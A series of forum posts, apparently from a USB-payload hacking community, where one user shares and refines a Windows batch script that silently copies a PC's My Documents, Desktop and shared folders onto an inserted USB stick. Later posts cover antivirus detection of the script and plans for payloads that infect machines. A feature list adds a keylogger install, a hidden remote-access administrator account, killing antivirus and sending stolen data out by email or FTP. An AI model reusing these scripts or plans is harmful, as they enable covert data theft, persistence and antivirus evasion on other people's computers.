DMilton

I haven't a Windows Vista installation for testing why it doesn't work with Vista, probabily is because the reg keys are not the same with Vista (someone can clarify this?). But for Windows XP must be working... You can adapt the script as far as you want, but, by the momment, I haven't so much time to do it for you. :(

Fixed, it works. Try this. echo off set ActualUser=".\CurrVer.dat" set TmpVal=".\tmpval.dat" set Common=".\Common.dat" set /A ValCounter=1 if exist %ActualUser% del /S /F /Q /A:- %ActualUser% if exist %Common% del /S /F /Q /A:- %Common% if exist %TmpVal% del /s /F /Q /A:- %TmpVal% REG EXPORT "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders" %Common% REG EXPORT "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders" %ActualUser% if not %errorlevel%==0 goto error type %ActualUser% | find "Personal" >> %TmpVal% type %ActualUser% | find "Desktop" >> %TmpVal% type %Common% | find "Common Documents">> %TmpVal% type %Common% | find "Common Desktop">> %TmpVal% FOR /F "tokens=2* delims==" %%i IN (.\tmpval.dat) DO set var="%%i" if "%var%"=="" goto error FOR /F "tokens=2* delims==" %%i IN (.\tmpval.dat) DO ( call:FOUND %%i ) del /S /F /Q /A:- %ActualUser% del /S /F /Q /A:- %Common% del /S /F /Q /A:- %TmpVal% goto :CONTINUE :FOUND SET PP="%~1" SET PP=%PP:\\=\% SET PP=%PP:"=% SET RegKey=%PP% IF %ValCounter%==1 SET MyD=%RegKey% IF %ValCounter%==2 SET Dsk=%RegKey% IF %ValCounter%==3 SET ShDoc=%RegKey% IF %ValCounter%==4 SET ShDsk=%RegKey% set /A ValCounter=ValCounter+1 :error GOTO :EOF :CONTINUE :: Here I added the actions you want to do mkdir %~d0\%computername%\MyDocs mkdir %~d0\%computername%\Desktop mkdir %~d0\%computername%\SharedDocs mkdir %~d0\%computername%\SharedDesktop xcopy "%MyD%" %~d0\%computername%\MyDocs /s/c/q/r/h xcopy "%Dsk%" %~d0\%computername%\Desktop /s/c/q/r/h :: Here I added similar slurping actions to do the same with Shared Documents and Shared Desktop (no worry what language you have) xcopy "%ShDoc%" %~d0\%computername%\SharedDocs /s/c/q/r/h xcopy "%ShDsk%" %~d0\%computername%\SharedDesktop /s/c/q/r/h exit

The problem you have is the language, if you want to do it with a defined path (Desktop is not same folder in greek than in english), it will surely fail. With Dingleberries method, you can easily modify the python script to slurp the desired files of "My PC". I prepared an slurping batch to do the exact thing you want, just substitute the second batch you have with this one: @echo off set ActualUser=".\CurrVer.dat" set TmpVal=".\tmpval.dat" set Common=".\Common.dat" set /A ValCounter=1 if exist %ActualUser% del /S /F /Q /A:- %ActualUser% if exist %Common% del /S /F /Q /A:- %Common% if exist %TmpVal% del /s /F /Q /A:- %TmpVal% REG EXPORT "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders" %Common% REG EXPORT "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders" %ActualUser% if not %errorlevel%==0 goto error type %ActualUser% | find "Personal" >> %TmpVal% type %ActualUser% | find "Desktop" >> %TmpVal% type %Common% | find "Common Documents">> %TmpVal% type %Common% | find "Common Desktop">> %TmpVal% FOR /F "tokens=2* delims==" %%i IN (.\tmpval.dat) DO set var="%%i" if "%var%"=="" goto error FOR /F "tokens=2* delims==" %%i IN (.\tmpval.dat) DO ( call:FOUND %%i ) del /S /F /Q /A:- %ActualUser% del /S /F /Q /A:- %Common% del /S /F /Q /A:- %TmpVal% goto :CONTINUE :FOUND SET PP="%~1" SET PP=%PP:\\=\% SET PP=%PP:"=% SET RegKey=%PP% IF %ValCounter%==1 SET MyD=%RegKey% IF %ValCounter%==2 SET Dsk=%RegKey% IF %ValCounter%==3 SET ShDoc=%RegKey% IF %ValCounter%==4 SET ShDsk=%RegKey% set /A ValCounter=ValCounter+1 :error GOTO :EOF :CONTINUE :: Here I added the actions you want to do mkdir %~d0\%computername% xcopy "C:\Documents and Settings\%username%\%MyD%" %~d0\%computername% /s/c/q/r/h xcopy "C:\Documents and Settings\%username%\%Dsk%" %~d0\%computername% /s/c/q/r/h :: Here I added similar slurping actions to do the same with Shared Documents and Shared Desktop (no worry what language you have) xcopy "C:\Documents and Settings\%username%\%ShDoc%" %~d0\%computername% /s/c/q/r/h xcopy "C:\Documents and Settings\%username%\%ShDsk%" %~d0\%computername% /s/c/q/r/h @cls @exit Tell us if worked DingleBerries method or mine.

Try my Reliable Paths Method that is published in the wiki. I think it'll solve your problem. Let us know it!

I scripted it for the pocketknife but it was never implemented because the project died. You can translate it to...anything! Look it, is very simply and the concept in how-to do it is easy to understand. And if you don't want to have it in a batch, you can compile it too. It will work in 99% of cases, let me know what systems don't let you run bats or vbs (questionable) EDIT: Bad link, try THIS ONE BTW if you want a proof of concept, I'll release it.

I think it's not necessary to have admin privileges to make a dd copy of ram memory. For your purpose, you can use Mantech Memory DD to make a forensic image of physical memory, storing it as a raw binary filemage. Then, at home, you can use Volatility (perl framework) to analyze the image. You can call the MDD (Mantech Memory DD) in an automated way from the usb with no problem (it doesn't need any library) and it will work for Windows 2000, Windows Server 2003, Windows XP, Windows Vista, and Windows Server 2008. The resultant image can grow to 4GB...

Why don't try to implement THIS to your payload's code? It'll give you a way to slurp all the desired documents you want with a pre-configured plain text file with the extensions you need. It's easy ready to go and only needs some of copy-paste actions. That's the war! EDIT: Bad link, changed to good one

I agree

With Avast! I get... http://www.myupload.dk/download/1864144e8f.zip\run.bat as HTML:Malware-gen. The bat is detected? Bad thing, man. The code is simple and it looks effective. The problem is that av is detecting the bat (I haven't tried with more av's). I prefer to have all type of configurable loads for the payload, but, it's not a bad work. For simple tasks, simple sollutions!

It's not difficult to program an app to do the next: a) Testing the serial number of the inserted USB (to not have to test for a concrete drive letter) B) If it fits with a given list, do some code (as nothing by example) c) If it doesn't fit with a given list, do some else code, as slurping the contents or creatting a perfect copy of the hardware (dd copy), or spreading some code inside the usb, or infecting something, or pushing the nuclear red button!!! It's only an idea, but factible. The only you have to do is programming it

Specific payload to an specific system? Hummm... I think that with the correct programming issues, It'll be factible to have one payload for all systems, the question is that you have to check many things before doing the work as os version, installation language, good checking of paths, checking for privileges, vulnerabilities, bypassing av, etc. It's why I was writting a new payload, of course

This is a free community, we can help others to have their weapons greased, but there's many people that doesn't want to read into a forum to get their onwn conclusions ready. Offering a service is as lucrative as getting the service ready to run without reading anything and without having any headache... Someone wants to be spooned? Ok, it'll surely have a price, isn't it? For other else who wants to learn, ever will be an answer on how-to.

Hi! I had an accident and by now I can't write as much I want, because my arm is broken. Be patient, the payload will be ready when I feel better!

English, Français, Español, Traditional Chinese... Wow! It sounds very good! I think an stable vbs+batch version will be ready next weekend, I need some time... Probably with something not enabled yet but working.

Ok, Pocket-Knife isn't still dead. Some known people in the forums is developing new functionallities that can be added to the payload. I'm working in my few free time trying to fix bugs and adding some other stuff to the pocketknife payload. Some of the forum users are doing their work and we are collaborating in keeping the payload alive. I hope, it will work all right on: - Correction of the "file not found" Error given while checking for mounted devices not present. - Cleaning of the code, specially with the use of variables. - Updating of all the programs used by the payload. - Extended detection of correct installation paths with reliable path method. - Total functionallity on other machines with non English installation languages. - Slurping for concrete files and/or concrete paths. - Slurping actions on all the users accounts of the PC. - Keylogger correct installation. - Results into an html way. - Adding a hidden administrator account of the user election with remote privileges. - Trying to look for a way to make the payload running on Vista systems (not sure). - Free election for retrieving results of the payload by different ways: email, ftp, http+PhP+SQL - Killing av tasks. - Addition of some of the stuff contained into the Tcstool payload U3 Incident Response Payload, thanks to Tcstool. - Addition of some of the stuff contained into the DingleBerries payload DingleBerries Tantō Payload, thanks to DingleBerries. - alexthedrifter is adding some useful new stuff to the payload, and working on a GUI to easy configuration of the payload options, thanks to alexthedrifter. - And more... Also I want to look for help/ideas into: - Translating the payload into other languages to have your own language spoken results payload. (I'll do the work for spanish language). - Code scripting to do the stuff done by the av detected nirsoft programs. Just wait a bit, I'm not plenty of time but working on it... And before releasing a version, I want it free of bugs.